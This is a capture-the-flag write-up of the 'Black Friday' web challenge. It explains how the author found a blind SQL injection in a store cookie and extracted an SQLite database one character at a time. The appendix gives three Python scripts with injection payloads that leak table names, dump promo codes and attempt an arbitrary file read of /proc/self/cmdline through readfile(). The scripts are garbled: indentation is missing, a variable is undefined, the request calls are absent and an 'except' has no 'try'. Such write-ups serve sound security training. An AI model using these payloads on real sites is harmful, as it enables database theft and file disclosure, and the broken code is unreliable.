Rating: 5.0
Viewable more nicely [here](https://github.com/NathanOrdSec/ctf-writeups/blob/main/US%20Cyber%20Open%20Season%20II/Black%20Friday%20Writeup.pdf) (https://github.com/NathanOrdSec/ctf-writeups/blob/main/US%20Cyber%20Open%20Season%20II/Black%20Friday%20Writeup.pdf)
# Black Friday
Black Friday sales are the best, and getting a pretty good deal on a new watch doesn't sound so bad, so let's dive in!
## Diving In
When I first opened this challenge, I initially thought, "cool, SQLi and get a flag using SQLMap!" While that may have entirely been possible, that is not quite the route I took, which may have been a little more difficult. In any event, I started with intercepting traffic using BurpSuite where I tried all the usual suspects for SQLi with comments, unions, and all that fun jazz. When that didn't turn anything up, I did some searching and realized I had forgotten about [blind SQLi](https://book.hacktricks.xyz/pentesting-web/sql-injection#exploiting-blind-sqli) (https://book.hacktricks.xyz/pentesting-web/sql-injection#exploiting-blind-sqli) using AND statements which turned up some results:
_Figure 1: AND 1=2 using the Richmond store, which didn't have any store entries_
_Figure 2: AND 1=1 using the Richmond store, which didn't have any store entries_
## Going Deeper
With this information in mind, we could start enumerating and setting up information, for example, the DB information, which I believe to be SQLite v. 3.34.1. However, I was doing this with a BurpSuite sniper attack for the version and then a cluster bomb attack for getting full words one character at a time from tables/columns/rows with some manual intervention required.
_Figure 3 Sniper/Cluster Bomb attacks (the latter like above) take time and babysitting._
## Automation Auto-magic
After sinking some time into this, I thought about automating this, so I did! Python FTW even though the code is a little jank. I found the most common English letters, put them in an array, and prepended letters I would expect to come up in a flag so that the comparisons would be a little quicker. Looking back now, of course, I forgot to move "g" up to the front, but you live and learn.
_Figure 4 Dumping table names! (Modify as needed to get more table names)_
"But wait a minute," the keener among us might ask, "how did you get anything beyond inventory?" Good question! I didn't, up until I learned a bit more about SQL statements. Did you know about the [limit clause](https://www.sqlitetutorial.net/sqlite-limit/) (https://www.sqlitetutorial.net/sqlite-limit/)? Nor did I!
With this new trick in the toolbox, thanks to some GoogleFu and this [PDF](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) (https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) paired with all the other information I could gather; I would eventually come to dump the flag. It only took finding the relevant table, column, and row by a little manual work still because I didn't use functions in Python and just did number changes by hand.
_Figure 5 Flag acquired given enough time!_
As you can see above, the flag gets printed out, so challenge complete!
On the side, I think I made a file reader for SQLite, which I could get to work locally but not remote. This issue likely has to do with permissions of the account used to access the DB remotely versus locally, where I was an administrator. C'est la vie!
_Figure 6 As least I tried!_
# **Appendix**
## Code Sample 1
import requests
import time
#Leak Tables
arr=[" ","_","e","t","a","o","n","s","r","u","c","q","0","1","2","3","4","5","E","T","A","O","N","I","H","S","i","h","l","d","u","c","m","w","y","f","g","p","b","v","k","j","x","z","R","L","D","U","C","M","W","Y","F","G","P","B","V","K","J","X","Q","Z","6","7","8","9"]
for i in range(13,100,1):
for j in arr:
cookie={"ww_store":'6 and (SELECT SUBSTR(tbl_name,'+place+',1) FROM sqlite_master WHERE type="table" and tbl_name NOT like "sqlite_%")="'+j+'";--'}
print(i," Found: ",j)
print("Failed on ",i)
## Code Sample 2
import requests
import time
#Leak Columns Content
arr=[" ","_","e","t","a","o","n","s","r","u","c","q","0","1","2","3","4","5","E","T","A","O","N","I","H","S","i","h","l","d","u","c","m","w","y","f","g","p","b","v","k","j","x","z","R","L","D","U","C","M","W","Y","F","G","P","B","V","K","J","X","Q","Z","6","7","8","9"]
for i in range(1,250,1):
for j in arr:
cookie={"ww_store":'6 and (SELECT SUBSTR(promo_code,'+place+',1) FROM promos limit 3 offset 2)="'+j+'";--'}
print(i," Found: ",j)
print("Failed on ",i)
except KeyboardInterrupt:
## Code Sample 3
import requests
import time
#Arb Read
arr=[" ",".","/","_","e","t","a","o","n","s","r","u","c","q","0","1","2","3","4","5","E","T","A","O","N","I","H","S","i","h","l","d","u","c","m","w","y","f","g","p","b","v","k","j","x","z","R","L","D","U","C","M","W","Y","F","G","P","B","V","K","J","X","Q","Z","6","7","8","9"]
for i in range(1,200,1):
for j in arr:
cookie={"ww_store":'6 and (CREATE TEMP TABLE a (value STRING);INSERT INTO a VALUES(readfile("../../../../../proc/self/cmdline"));'+
'SELECT SUBSTR(value,'+place+',1) FROM a;DROP TABLE a;)="'+j+'";--'}
print(i," Found: ",j)
print("Failed on ",i)